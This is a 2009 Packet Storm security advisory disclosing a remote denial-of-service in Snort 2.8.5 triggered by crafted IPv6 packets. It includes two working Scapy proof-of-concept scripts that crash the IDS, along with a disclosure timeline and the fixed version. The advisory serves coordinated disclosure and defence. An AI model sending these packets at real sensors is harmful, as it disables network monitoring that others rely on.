Snort 2.8.5 IPv6 Remote Denial Of Service

2009-10-23T00:00:00
ID PACKETSTORM:82149
Type packetstorm
Reporter laurent gaffie
Modified 2009-10-23T00:00:00

Description

                                        
                                            `=============================================  
- Date: October 22th, 2009  
- Discovered by: Laurent Gaffié  
- Severity: Low  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Snort <= 2.8.5 IPV6 Remote DoS  
  
  
II. DESCRIPTION  
-------------------------  
A remote DoS was present in Snort 2.8.5 when parsing some specialy IPv6  
crafted packet  
To trigger theses bugs you need to have compiled snort with the  
--enable-ipv6 option, and run it in verbose mode (-v)  
  
III. PROOF OF CONCEPT  
-------------------------  
You can reproduce theses two differents bugs easily by using the Python  
low-level networking lib Scapy  
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)  
  
1) #only works on x86  
  
#/usr/bin/env python  
from scapy.all import *  
u = "\x92"+"\x02" * 6  
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP  
  
2) # works x86,x64  
  
#/usr/bin/env python  
from scapy.all import *  
  
z = "Q" * 30  
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 ->  
icmp (not v6)  
  
  
IV. SYSTEMS AFFECTED  
-------------------------  
Theses proof of concept as been tested on snort:  
- 2.8.5  
  
V. NOT AFFECTED  
-------------------------  
Sourcefire 3D Sensor  
  
  
VI. SOLUTION  
-------------------------  
A new version correcting theses issues as been released (2.8.5.1) :  
  
http://www.snort.org/downloads  
  
  
VII. REFERENCES  
-------------------------  
http://www.snort.org/  
http://vrt-sourcefire.blogspot.com/  
  
VIII. REVISION HISTORY  
-------------------------  
October 14th, 2009: First issue discovered, advisory send to snort team.  
October 14th, 2009: Snort security team confirm the bug.  
October 16th, 2009: Second issue discovered, advisory send to snort team.  
October 20th, 2009: Snort security team confirm the bug.  
October 22th, 2009: Snort team released a new version.  
  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered by Laurent Gaffié  
Laurent.gaffie{remove-this}(at)gmail.com  
`